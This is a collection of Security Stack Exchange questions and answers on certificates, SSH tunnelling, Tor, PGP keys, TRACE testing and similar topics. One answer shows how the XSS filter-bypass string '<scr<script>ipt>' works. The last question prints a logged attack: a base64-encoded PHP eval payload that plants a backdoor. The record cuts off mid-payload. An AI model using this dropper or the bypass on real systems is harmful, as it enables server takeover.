type RSA or ElGamal). Therefore, for your problem, you do not want to "encrypt with X.509". X.509 defines nothing about encryption. What you want is to use a standard format which describes encryption with the recipient's public key and builds on X.509 certificates for the public key distribution. This standard format, coupled with X.509, would be an analogous to OpenPGP. This standard format exists and is called CMS (formerly known as "PKCS#7"). When CMS objects are sent by email, this becomes another layer of standard, which is called S/MIME . CMS (or S/MIME) is what you need for asynchronous communication: you prepare a blob, to be sent later on to the recipient, like what you do with OpenPGP. If you can make a synchronous communication (sender and recipient are "online" simultaneously), then you can use SSL/TLS (or its Web counterpart HTTPS ). In SSL, the server has a public key, which it sends to the client as an X.509 certificate. The client validates the certificate, then uses the public key contained therein in order to establish a session key with the server, and encrypt the data with that session key. In any case, assembly of cryptographic algorithms into protocols is known to be hard to do correctly, nigh impossible to test for security, and fraught with perils. So don't imagine that you may build your own mix; you really should rely on an existing standard, like CMS or SSL.
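A minimal sketch of the "distribution" half, using the pyca/cryptography package (assumed installed; the file name is hypothetical): the certificate only binds a name to a public key, and the actual encryption is then done by a protocol such as CMS/S-MIME or TLS using the key extracted here.

```python
from cryptography import x509

# Load a vendor's certificate and pull out the name binding and public key.
pem = open("vendor_cert.pem", "rb").read()   # hypothetical file name
cert = x509.load_pem_x509_certificate(pem)
print(cert.subject.rfc4514_string())         # who the CA says this key belongs to
print(cert.not_valid_before, cert.not_valid_after)
public_key = cert.public_key()               # hand this to CMS/TLS; do not roll your own scheme
```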
{ "source": [ "https://security.stackexchange.com/questions/31139", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20192/" ] }
31,148
Our security vendor detected that our client's CAS server was doing a nessus scan in the internal network. It's not uncommon for this vendor to issue a false positive, but I'm looking for general guidance on how I should analyze this Windows based server if a hack was indeed attempted. What files might be left over? What might be modified? How do I safely gather enough information to know if it should be nuked from orbit.
{ "source": [ "https://security.stackexchange.com/questions/31148", "https://security.stackexchange.com", "https://security.stackexchange.com/users/396/" ] }
31,226
Are there client programs that allow me to "tunnel" through my SSH enabled server for normal Internet requests such as HTTP(s)? If so what are they and can someone point me in the right direction? Note: I'm not asking about a VPN; I'm specifically asking if its possible to "tunnel" a connection through SSH.
Most SSH clients will do that for you. With the ssh client provided with any good Linux system, simply type: ssh -D 5000 -N theservername where theservername is the name of the SSH server to which you want to tunnel the requests. Then set your Web browser to use localhost, on port 5000, as a SOCKS proxy. And voilà! All your HTTP and HTTPS requests will go through the SSH tunnel and exit on the other side. For Windows, PuTTY can also be used as a SOCKS proxy.
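One way to check that traffic really leaves through the tunnel is a short Python script; it assumes the requests package with its optional SOCKS support is installed, and the echo URL is just one convenient example:

```python
import requests  # needs: pip install "requests[socks]"

# After `ssh -D 5000 -N theservername`, route a request through the local SOCKS
# proxy and check which public IP the far end sees.
proxies = {
    "http":  "socks5h://localhost:5000",   # socks5h = resolve DNS on the far side too
    "https": "socks5h://localhost:5000",
}
print(requests.get("https://httpbin.org/ip", proxies=proxies, timeout=10).text)
```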
{ "source": [ "https://security.stackexchange.com/questions/31226", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
31,229
On a banking website I see that they have disabled right-click. Does that make the site any more secure? Is it a good general practice?
Does it make the site any more secure? No, it doesn't alter anything other than your ability to conveniently save items from a page. Using a browser's developer mode, turning off JS, overriding this with a different script that disables that pop-up, or just grabbing data off the wire after stripping the SSL will all work. Is it a good general practice? This is an ache that the Internet has had to suffer since the height of GeoCities fame, when folks didn't want you to "steal" their very poorly composed photos of dandelions and family pets. Dispensing with all professionalism and being as straightforward as possible: I might hesitate to convict a person for smacking the party responsible for any modern site using this upside the head with a cast-iron skillet. Aside from that, it has generally fallen out of favor for being both ineffective and annoying. For instance, it also makes my spellchecker misbehave.
{ "source": [ "https://security.stackexchange.com/questions/31229", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3185/" ] }
31,303
There is an attack that some people have dubbed "lag hacking", and it's gaining popularity in multiplayer games. There are at least two ways of creating artificial latency. One method of introducing artificial latency is using a lag switch, where the user intentionally disconnects their network cable. Another method is using a flood of SYN or UDP packets to cause controlled and predictable disruption in the game so that a player can gain an unfair advantage. Artificial latency attacks affect a large number of multiplayer games. Some game companies have been made aware of this attack by their users, but are ignoring this vulnerability because they don't have a solution. The tools to carry out this attack are simple to construct, readily available and easy to use. They will often spoof the source IP address to make the attack difficult to trace. So security.se, let's come up with a solution to this problem. But first let's talk a bit about game protocols. Online games commonly use UDP due to decreased latency and overhead, but this also increases the susceptibility to spoofing. Game protocols can use Latency Hiding to decrease the "perceived latency", but this may increase the impact of artificial lag. Multiplayer games often use a p2p architecture, for example Hydra: Peer-to-Peer architecture for games, and a peer is easy to flood. The Unreal network architecture is well documented, and is also vulnerable to this attack. (If there is another resource I should list, let me know!)
I see two conceptual paths for dealing with lag attacks: Punish lags . When an "artificial" lag is detected, evict the offender and enforce a ban period. This is hard to do in practice because there is a delicate balance to be found between people who cheat through lagging, and people who simply suffer from an occasional hiccup in their Internet connection. It is bad business practice to smite your own customers. Such kinds of solutions will necessarily end up with a threshold to distinguish between bad people and unlucky people. Cheaters will stick close to the threshold and this will probably be sufficient to gain some strategic advantage. One promising approach along the punishment line is to apply small but cumulative penalties for each lag: whenever a packet is lost or shows up late, remove one hit point, make the player flash, whatever... this can even be integrated in the game universe (for instance, for a FPS convert the detected lag into a rifle jam). This implies that people with reliable Internet connections and big computers will be at an advantage -- and I believe that players are ready to accept that, on the basis that similar things happen in a lot of other leisure-competition situations (e.g. if your hobby is skateboarding, you know that a better skateboard will not replace talent, but will help nonetheless, and skateboarder accept that as a fact of life). Ultimately, this might incite ISP to work a bit on their latency, which would be good for everybody , not just gamers. Don't trust clients . Massively online games are distributed computing . Most of their security issues are due to the fact that many game rules, i.e. the properties of the world in which the players act, are maintained by the client systems. The players themselves, and in particular the potential cheaters, have extensive control of their machines. Existing countermeasures tend to have limited effectiveness for the same reasons that software DRM and antivirus may fail: this is an arms race in which attackers and defenders are locked into a fast-paced battle of patches and counterpatches which is tiresome and requires expensive, continued maintenance. The generic architectural response is to maintain the game rules server-side only; clients become "thin" and are just display interfaces. This is unfortunately hard to implement, because display performance (hence game experience) becomes very sensitive to latency, artificial and natural alike; and ADSL links will have a minimal latency close to 50 ms, which is high with regards to average gamer reflexes. Also, this means that the game servers need more CPU muscle. But the security advantage is huge: when a player induces lagging, he inherently punishes himself and none other. Maintaining all game state and rules on the servers is not completely science-fiction either. Back in the late 1980s, one of the very first MMO games was "CarCrash", an offspring of the defunct French magazine Jeux et Stratégie ; it was played over the Minitel , another old French technology where users simply had text terminals (with limited graphics) with no local computing abilities; the central server(s) maintained the game rules and computed the screen updates for everybody, and it worked. Computers at that time had far less CPU muscle than today; a 20 MHz CPU was enough to be deemed a "supercomputer". A 35$ home router of 2013 is more than ten times as powerful as a big server of that era. And yet it worked. 
Maintaining game rules on the server implies departing from the way games are usually architected. Historically, most games were local and became multiplayer by connecting clients with each other, with possibly a central server which only served as rendez-vous point. To take a political metaphor, games became multiplayer by forming confederations , but security against cheaters requires a federation . Mixed strategies are possible, of course. The core idea is the same: give as little sensitive data as possible to client systems; and when you must trust them for something, use a big stick or a big carrot to keep them in line . (If you understand that players should be handled like cattle herds, well,... there is truth in that, indeed. You don't want your cows to be unhappy, but you will not let them choose their walking direction and pace either.) Edit: just got an insight while waiting for my tea to cool a bit. A game architecture could include several (possibly dozens of) cooperating "trusted" servers spread worldwide, which "play the game" like game clients do today. Each gamer would connect to one server which is "close by" (in a network sense) so as to have a low latency, allowing for the display-only strategy outlined above. If ISPs themselves can be involved in the deal (each ISP would host a few servers in its own infrastructure) then this could make sense in a business way.
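The "small but cumulative penalties" idea from the first option is easy to prototype on the server side; a toy sketch, with all numbers invented for illustration:

```python
import time

# Toy sketch: every client update that arrives after its deadline costs the
# player one penalty point (e.g. jam the rifle, drop a hit point, ...).
DEADLINE = 0.150  # seconds allowed between client updates (invented value)

class LagMeter:
    def __init__(self):
        self.last_update = time.monotonic()
        self.penalty_points = 0

    def on_client_update(self):
        now = time.monotonic()
        if now - self.last_update > DEADLINE:
            self.penalty_points += 1   # small, cumulative, hard to game near the threshold
        self.last_update = now
        return self.penalty_points
```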
{ "source": [ "https://security.stackexchange.com/questions/31303", "https://security.stackexchange.com", "https://security.stackexchange.com/users/975/" ] }
31,337
A technique for avoiding filters on common words is the one I described in the title. However, why does this technique work? SELECT isn't the same as SELSELECTECT, for example.
Let's say I blacklisted the word <script> and replaced it with nothing. Then <scr<script>ipt> becomes <script> . This is why well-written HTML sanitizers/purifiers apply the rules recursively: only when the last sanitization pass made no changes to the content will they stop applying another round of the processing rules. (A good one will also likely fail and return no content if too many processing rounds are necessary.)
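A minimal Python sketch of the difference, with a deliberately simplistic blacklist rule:

```python
import re

BLACKLIST = re.compile(r"</?script>", re.IGNORECASE)

def naive_strip(s):
    """One pass only: removed fragments can reassemble into the forbidden word."""
    return BLACKLIST.sub("", s)

def recursive_strip(s, max_rounds=10):
    """Re-apply the rule until a pass changes nothing (or give up and reject)."""
    for _ in range(max_rounds):
        cleaned = BLACKLIST.sub("", s)
        if cleaned == s:
            return cleaned
        s = cleaned
    return ""  # too many rounds: safer to return nothing

payload = "<scr<script>ipt>alert(1)</script>"
print(naive_strip(payload))      # -> "<script>alert(1)"  (the tag reassembles itself)
print(recursive_strip(payload))  # -> "alert(1)"          (the tag never survives)
```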
{ "source": [ "https://security.stackexchange.com/questions/31337", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
31,376
Is it possible to create a CA certificate (even unsigned), which is only allowed to sign certificates for specific limited domain(s), so that it can't be misused for other domains?
No. (I assume you are talking about certificates for SSL servers.) Technically no. What would be closest to that would be the Name Constraints extension (see section 4.2.1.10 of RFC 5280 ) ( OID 2.5.29.30 ), which theoretically allows for restricting a complete PKI subtree to an explicit set of domains (and subdomains thereof). The extension supports both whitelist and blacklist semantics (in your case, you would like a whitelist). In practice, however, this fails for two reasons: The Name Constraints extension is mostly unsupported by existing implementations of SSL. They are likely to ignore the extension. When a SSL client connects to a server, it looks for the server name in the server certificate, as specified in RFC 2818, section 3.1 . It will look for names of type dNSName in a Subject Alt Name extension, and these names are covered (theoretically) by the Name Constraints . However, if the server certificate lacks a Subject Alt Name extension, clients will fall back on the Common Name (in the subjectDN ). The Common Name is not in scope of the Name Constraints . This means that a certificate could evade the name constraints by omitting the Subject Alt Name extension and putting an arbitrary server name in its Common Name. (This is the whole story of X.509: lots of hooks and provisions for many useful features, which don't work because of lack of support from implementation and lack of coordination between specification bodies.)
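For what it's worth, checking whether a CA certificate even carries the extension is straightforward with the pyca/cryptography package (assumed installed; the file name is hypothetical), bearing in mind that many clients ignore it anyway:

```python
from cryptography import x509
from cryptography.x509 import ExtensionNotFound, NameConstraints

# Inspect a (sub-)CA certificate for a Name Constraints extension.
cert = x509.load_pem_x509_certificate(open("sub_ca.pem", "rb").read())  # hypothetical file
try:
    nc = cert.extensions.get_extension_for_class(NameConstraints)
    print("permitted:", nc.value.permitted_subtrees)
    print("excluded: ", nc.value.excluded_subtrees)
except ExtensionNotFound:
    print("No Name Constraints: this CA can sign for any name.")
```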
{ "source": [ "https://security.stackexchange.com/questions/31376", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21121/" ] }
31,451
I've set up my VPS's SSH server to accept only key-based authentication: I disabled password-based logins. As a consequence, I am connecting from home with an RSA key generated prior to disabling passwords on my VPS. Of course, I copied the public key into the ~/.ssh/authorized_keys file before that. Now I want to do the same thing from work, generating a new key pair (I've read it is clearly better to generate a new key pair for each source of connection). I guess the best thing to do is to generate the key at my workplace. But then I am facing the issue of transferring the public key from my workplace to the VPS. Since I disabled password-based connections, I won't be able to transfer it directly from work. I could re-enable password authentication just before returning to my workplace, and disable it again from my workplace once I am able to connect to my VPS. But then I would like to know: is it secure to send the public key by email to myself?
The public key is public , meaning that everybody can know it without endangering security. No problem in putting it in an email, then. The potential issue would be an active attacker modifying the email while in transit, to replace your public key with his public key. To guard yourself against such attacks, compute a fingerprint of the file you are about to send by email (use the ubiquitous md5sum utility on it), and write the hash value on a piece of paper (which you keep in your wallet). When you are back at home, recompute the hash over the received file, and compare it with the value on the paper. If they match, then everything is fine.
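A sketch of the fingerprint step in Python, using SHA-256 instead of MD5 as a sturdier (but equally convenient) choice; the file name is hypothetical:

```python
import hashlib

# Compute a fingerprint of the public key file before mailing it, and write the
# value down on paper. At home, recompute it over the received file and compare.
with open("id_rsa_work.pub", "rb") as f:   # hypothetical file name
    digest = hashlib.sha256(f.read()).hexdigest()
print(digest)
```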
{ "source": [ "https://security.stackexchange.com/questions/31451", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16718/" ] }
31,463
Every SSL certificate has an expiration date. Now suppose some site's certificate expired an hour ago or a day ago. By default, all software will either just refuse to connect to the site or issue security warnings. This recently happened to Windows Azure Storage, and since most of the software in dependent services defaulted to refusing to connect, lots of services experienced major degradation. Now what's the logic here? I mean, a day ago the certificate was valid and everyone was happy to use it; a day later it's formally expired and no one likes it anymore. I've read this answer and I don't find it convincing for this specific edge case. To every security model there is a threat model. What's the threat model here? What could have happened between a day ago and now that a certificate is treated as so unusable that we even refuse to connect to the site?
When a certificate is expired, its revocation status is no longer published. That is, the certificate might have been revoked long ago, but it will no longer be included in the CRL. Certificate expiration date is the cut-off date for CRL inclusion. That's the official reason why certificates expire: to keep CRL size bounded. (The unofficial reason is to make certificate owners pay an annual fee.) So you cannot trust an expired certificate because you cannot check its revocation status . It might have been revoked months ago, and you would not know it.
{ "source": [ "https://security.stackexchange.com/questions/31463", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2052/" ] }
31,465
I have two machines: one running Windows with IIS and one running Windows with MS SQL. In the production web.config file I configure IIS to use a user name and password when connecting to the DB, and then I encrypt it with a key using RSA. The key will be generated using aspnet_regiis and exported to all IIS machines. Each production server holds only the encrypted web.config file (and an imported key secured in IIS). The other approach would be to define in the web.config a connection using Windows authentication. This would be a lot less work on my side. Which practice is better? Which is safer?
{ "source": [ "https://security.stackexchange.com/questions/31465", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21176/" ] }
31,549
Firefox 19 ships with pdf.js as the default PDF reader . One of the main stated goals is to reduce the exposure of users to the often vulnerable Adobe PDF reader/plugin. So what new risks does pdf.js bring? An attacker that can get a user to browse to their malicious PDF could also get the user to browse to a malicious web page. Any vulnerabilities in the HTML5 renderer or javascript interpreters could have been exploited that way anyway.
I actually think the Mozilla devs have been pretty smart with this. Historically, most PDF exploits have come from the rendering engine rather than the parsing side. Adobe got wise early to the fact that malformed structure and content would screw them, and put a lot of effort into making sure that their parsing engine was rock solid. If you look at some of the recent 0-day stuff for Adobe Reader, you'll see that most of it relies on bugs in the rendering engine and some of the more exotic areas of content handling. The new Firefox PDF engine simply takes the structure of the PDF and translates it into a DOM structure, which can be rendered by the browser's standard HTML renderer and interacted with via JavaScript. This removes a huge portion of the attack surface, and allows them to entirely focus on the security of the document translation engine. Any real exploitable bugs are likely to be reliant on a secondary bug that could be exploited through other means anyway. If there are exploits, I see them coming from the following areas: 3rd party objects being loaded into the page, which can then exploit a separate Java / Flash / HTML5 / etc. bug. Probably preventable by using a restrictive content origin policy. Bypassing content escaping so that arbitrary JavaScript can be executed in the context of the PDF. Again a lot of the significance of this is related to origin policies. Buffer overflows in any native code responsible for PDF translation. Since most of the engine seems to be based in JavaScript, I'm unsure as to how likely this is. All in all, I don't think it brings much of an increased security risk, and once it's been around for a few months I'd consider it an ideal drop-in replacement for Adobe PDF plugins, which have been a source of many headaches.
{ "source": [ "https://security.stackexchange.com/questions/31549", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18452/" ] }
31,589
If I use a Tor router to browse the regular internet, my traffic must leave the Tor network through an exit node. Apparently the exit node can see the data originally sent. Is this true? If an adversary wanted to deanonymize me, wouldn't they just have to subpoena the exit node owner or hack it? Does this mean a proxy is about as safe, since the above applies to both?
In Tor , the user (you) chooses a random path through several nodes for its data. The first node in the path knows your IP address, but not what you send or where. The last node ("exit node") knows the target server address and sees the data (unless SSL is used, of course), but not your IP address. Every node in the path knows only the addresses of the previous and the next nodes in the path. If a government is intent on unraveling the privacy of Tor, then its best chance is to setup and operate a lot of nodes (which, of course, will not say "provided by your friendly government"). If your computer randomly chooses a path which begins by a government-controlled node and ends with another government-controlled node, then both nodes can correlate their data pretty easily and reveal both your IP and the target server (and sent data, if no SSL). Correlation is simple because while encryption hides the contents of data, it does not hide the length . If node A sees a 4138-byte request entering the Tor network from your IP, and node B sees a 4138-byte request within the next second exiting the Tor network and destined to server www.example.com , then node A and node B, by collating their data, will infer that your IP was involved with a communication to www.example.com . It can easily be proven that if the hostile party does not eavesdrop on or hijack both the entry and exit nodes, then your privacy is maintained. But if they do , then privacy evaporates like a morning mist under the midday Sun.
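The size-and-timing correlation described above can be illustrated with a toy script; every log entry below is invented:

```python
from datetime import datetime, timedelta

# Toy illustration of traffic correlation: match records by payload size and a
# one-second time window. All values are invented.
entry_log = [("203.0.113.7", 4138, datetime(2013, 3, 1, 12, 0, 0))]              # (client IP, bytes, time)
exit_log = [("www.example.com", 4138, datetime(2013, 3, 1, 12, 0, 0, 400000))]   # (target, bytes, time)

for client, size_in, t_in in entry_log:
    for target, size_out, t_out in exit_log:
        if size_in == size_out and abs(t_out - t_in) < timedelta(seconds=1):
            print(f"{client} likely talked to {target}")
```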
{ "source": [ "https://security.stackexchange.com/questions/31589", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6372/" ] }
31,594
Since most key types can be used for multiple purposes, namely certification, authentication, encryption and signatures, one could simply use one key for everything - which is a bad idea, as elaborated e.g. by Thomas Pornin . So one should use different key pairs for different purposes, with different backup methods (decryption should remain possible "forever", while signature keys can "simply" be replaced) and securing. But I haven't managed to find a one-in-all write up of best practice summarizing answers to the following questions: What type of key should be used for which purpose (RSA, DSA, ... how many bits, when should they expire etc)? Should all keys be (separate?) subkeys of the certification master key or be individual master keys signed by the former one? I found some non-trivial guides on how to remove the secret master key from your day-to-day used subkeys, but is the trouble involved really worth having a shorter chain-of-trust to these keys compared to an entirely separate certification key? How important is it actually to keep the certification key offline when one uses a) a "really" strong passphrase or b) a hardware device like an OpenPGP card?
About Using Subkeys Use one primary key for each identity you need, otherwise, use subkeys. Examples for using multiple primary keys: You don't want to mix up your private and professional keys You need some key not connected with your "real life" identity, eg. when prosecuted by the authorities Examples for using subkeys: You want to use multiple keys for multiple devices (so you won't have to revoke your computer's key if you lose your mobile) You want to switch keys regularly (eg., every some years) without losing your reputation in the Web of Trust I recently posted about How many OpenPGP keys to make in another answer. About Key Sizes The GnuPG developers recommend using 2k RSA keys for both encryption and signing. This will be definitely fine for currently used subkeys. As your primary key will not be used for anything but keysigning and validating signatures (and revocation of course), it is seen as good practice to have a quite huge key here, while using smaller sizes (huge enough for time you will need them) for subkeys (which will speed up calculations and reduce file sizes). I had a more detailed answer facing RSA with DSA/Elgamal for another question at Superuser, go there for reading further. Key Expiration There are two ways a private key could get compromised: Somebody is able to steal it from you Somebody is able to recalculate it from your public key First is a matter of your computer's security (and how you use your key, read below), second is a matter of time. Today (and probably the next few years), RSA 2k keys will be totally fine. But computing power rises dramatically, so an attacker needs less CPU cores/graphic cards/computers/power plants to recalculate your private key. Also, glitches could be found in the used algorithms, leading to much less computing power needed. Quantum computers could speed up things even more. A key expiration date will limit the validity of your key to a given time you expect it to be secure. Any attacker cracking it afterwards will only be able to read encrypted data send to you, but nobody will use it any more; if an attacker gets hold of your key and you stay unnoticed, at least it will stop him from having use from it after a given time. Expiring your primary key will let you lose all your Web of Trust reputation, but at least invalidates your key after a given time if you lose access (what should never ever happen, read on at the end of my answer). Storing your Primary Key Offline Your primary key is the most crucial one. All trust - both incoming and outgoing - is connected with this. If somebody gets access to it, he's able to: Create new keys using your name (and GnuPG always uses your newest subkey by default!) Revoking subkeys and primary keys Issuing trust to other keys, which is the worst thing to happen: An attacker could create a new key, giving it trust from your old one and then revoke your old key, leaving you without any access to your "moved" identity - he's literally overtaking your identity . How important is it actually to keep the certification key offline when one uses a) a "really" strong passphrase [...]? Your computer always could be hacked or infected by some malware downloading your keys and installing a key logger to fetch your password (and this is not a matter of which operating system you use, all of them include severe security holes nobody knows about at this time). Keeping your primary (private) key offline is a good choice preventing these problems. 
It involves some hassle, but reduces the risks stated above. Highest security would of course mean using a separate, offline computer (hardware, no virtual machine!) to do all the key management using your primary key, and only transferring OpenPGP data (foreign keys and signatures you issued) using some thumb drive. b) a hardware device like an OpenPGP card? OpenPGP smart cards are somewhere in between storing the key offline on a thumb drive that you attach to your computer for signing, and using another offline computer dedicated to this purpose. Your private key will never leave the smart card (except for backup purposes, which requires an "admin PIN"); all signing and even key creation will happen inside the card. "Using" your key (encryption, signing, giving trust) will only require a "user PIN", so even if you connect the card to a compromised computer, the attacker will not be able to completely take over your identity. You can store your public key wherever you want; to get real use out of OpenPGP, you should even send it (and your other public keys) to the keyservers. And do not forget to create and print a revocation certificate of your primary key. Losing your private key without this certificate means there is a key lingering on the keyservers that you can no longer access and can do nothing about. Print it, possibly several times, and put it in places you trust: your parents, some bank deposit box, ... If this certificate leaks, the worst thing that can happen is losing your Web of Trust.
{ "source": [ "https://security.stackexchange.com/questions/31594", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3272/" ] }
31,659
How can I test for HTTP TRACE on my web server? I need to train a tester how to verify that the HTTP TRACE method is disabled. Ideally I need a script to paste into Firebug to initiate an HTTPS connection and return the web server's response to an HTTP TRACE command. Background: Our security pen testers identified an HTTP TRACE vulnerability and we need to prove that it is fixed. References: OWASP on XST Apache Week
Simplest way I can think of is using cURL (which is scriptable). curl -v -X TRACE http://www.yourserver.com Running it against an Apache server with TraceEnable Off correctly returns HTTP/1.1 405 Method Not Allowed (just tested on an Apache 2.2.22) This also works on HTTPS sites, provided that cURL has the correct information supplied to the SSL layer. This is the lazy man's check of Google curl --insecure -v -X TRACE https://www.google.com/ ...it negotiates the connection (does not verify the certificate chain, but that's not the issue here since we want to check on TRACE status), and responds 405: * Server certificate: * subject: C=US; ST=California; L=Mountain View; O=Google Inc; CN=www.google.com * start date: 2013-02-20 13:34:56 GMT * expire date: 2013-06-07 19:43:27 GMT * subjectAltName: www.google.com matched * issuer: C=US; O=Google Inc; CN=Google Internet Authority * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > TRACE / HTTP/1.1 > User-Agent: curl/7.25.0 (x86_64-suse-linux-gnu) libcurl/7.25.0 OpenSSL/1.0.1c zlib/1.2.7 libidn/1.25 libssh2/1.4.0 > Host: www.google.com > Accept: */* < HTTP/1.1 405 Method Not Allowed
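Since cURL is scriptable, the same check can be wrapped in a small shell loop when several hosts have to be verified (the host names below are placeholders; a 405 or 501 response means TRACE is rejected, a 200 that echoes your request means it is enabled):

#!/bin/sh
for host in www.example.com www.example.org; do
    code=$(curl -sk -o /dev/null -w '%{http_code}' -X TRACE "https://$host/")
    echo "$host: TRACE returned HTTP $code"
done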
{ "source": [ "https://security.stackexchange.com/questions/31659", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2210/" ] }
31,689
A few days ago one of my webhosting customers had their FTP login compromised, and the attacker modified his index.php file to include some extra code; roughly twelve thousand other bots have been trying to access it via a POST operation ever since. I'm okay at PHP but no genius; from what I've been able to garner, it takes the (encrypted) data included in the POST, decrypts it together with the contents of another file left behind on the host, and sends a response packed into an HTTP 503 header. From the behavior, I get the feeling this system was set up as a control host for a botnet. I've managed to save a copy of the PHP code as well as a packet capture of one of the bots trying to POST after I'd already deactivated the site... But now what do I do with it? I don't have the time or expertise to further analyze the damn thing myself, so what groups should I forward the lot to?
If you want it analysed for business reasons then you need to find an appropriately skilled forensic incident response consultant (excuse the jargon: 'A log analysis guy'). These generally cost money, lots of it. Bear in mind though that most botnet deployments aren't targeted and are very wide-spread. There probably isn't much to learn about it that isn't already well-known and which affects everyone else. Groups that deal with advanced threats won't be terribly interested in this sort of thing, but you might have luck with an AV vendor. Symantec, Sophos, etc sometimes like to collate this kind of data for their glossy white papers. The most interesting logs are going to be the ones just before the suspicious traffic starts when the botnet actually exploits the system, since that will allow you to do a post-mortem on the attack. However I'm going to use my amazing psychic abilities to assert that something wasn't appropriately patched and that's how the bot got in. Addendum: For the love of the Gods don't just give access to your systems (or sensitive data on your systems) to some random person on this site.
{ "source": [ "https://security.stackexchange.com/questions/31689", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2467/" ] }
31,748
The other day, there was a web developer mailing list thread about a fundraiser page. One person noted that the page with the credit card form was HTTP, not HTTPS. In response, one person said that since the target of the form was HTTPS, it's not a problem: "Nah, the form's submitted via https, served by Stripe. The site itself is http, though..." However, someone argued in response that that is not enough: "You have not established that the form is secure. A MITM may modify the HTML in the response for http://example.com/ to replace the form's 'action' attribute." The website in question has since changed such that going to http://example.com takes you to https://example.com instead, so it's (hopefully) secure now, but I want to know for future reference. Is a credit card form being on HTTP, but the target being HTTPS, a security risk for MITM attacks?
Yes, that last someone is correct: in addition to encryption (confidentiality), HTTPS gives you the assurance that the form is coming from where you think it is (authentication), and that it has not been interfered with in transit (integrity). Without HTTPS the form could be modified by a MITM as described. Not using HTTPS for this is simply bad practice (since the user is often the weakest link): when entering important data the user should just expect to see HTTPS (padlock/green bar/whatever) at every step, no exceptions. Most browsers will warn by default if you POST from an HTTPS page to a non-HTTPS URL, but they don't all clearly indicate that your data is being sent securely in the opposite case. Lack of HTTPS also means that the site won't be using "secure" cookies. See also: Is posting from HTTP to HTTPS a bad practice? Properly addressing this issue requires HTTP STS (RFC 6797), though a bootstrapping issue remains with the first HTTP request in most cases. A similar issue is the practice of using an iframe to an HTTPS site within an HTTP page, e.g. a 3rd-party credit card service. In this case, though the form and the POST are HTTPS, there's no assurance of integrity for the non-HTTPS content containing the iframe. The browser doesn't show that the form is HTTPS (at least not in the normal way, if at all), so this also violates the expectations of a security-conscious user.
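To illustrate the HSTS (RFC 6797) point, a typical setup redirects all plain-HTTP traffic and then asks browsers to remember to use HTTPS. The following Apache snippet is only an illustrative sketch; the host name, max-age value and the rest of the TLS configuration are placeholders:

<VirtualHost *:80>
    ServerName www.example.com
    # send every plain-HTTP request to the HTTPS site
    Redirect permanent / https://www.example.com/
</VirtualHost>

<VirtualHost *:443>
    ServerName www.example.com
    # SSL/TLS directives omitted for brevity
    # HTTP Strict Transport Security (requires mod_headers)
    Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
</VirtualHost>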
{ "source": [ "https://security.stackexchange.com/questions/31748", "https://security.stackexchange.com", "https://security.stackexchange.com/users/8335/" ] }
31,916
So one of the Invision Power Board installations on my server was recently compromised. I found what seemed to be the attack (using PHP in the query string and carefully crafted cookies), and I blocked URL strings with PHP tags in the query string. However, the attack signature in my logs from the actual log looks slightly different than the attack signature of my tests. It looks like they are sending PHP in the user agent string. Can anyone help me figure out what this is doing? Also, would blocking user agent strings with a PHP tag fix this? 93.115.84.154 - - [12/Feb/2013:04:03:23 -0400] "GET / HTTP/1.0" 200 4186 "" "<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0yZTAzMGJhMzQ4ZWI0Nzg3N2I5OTQ5MzRkNDIwYzQ3NS5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQo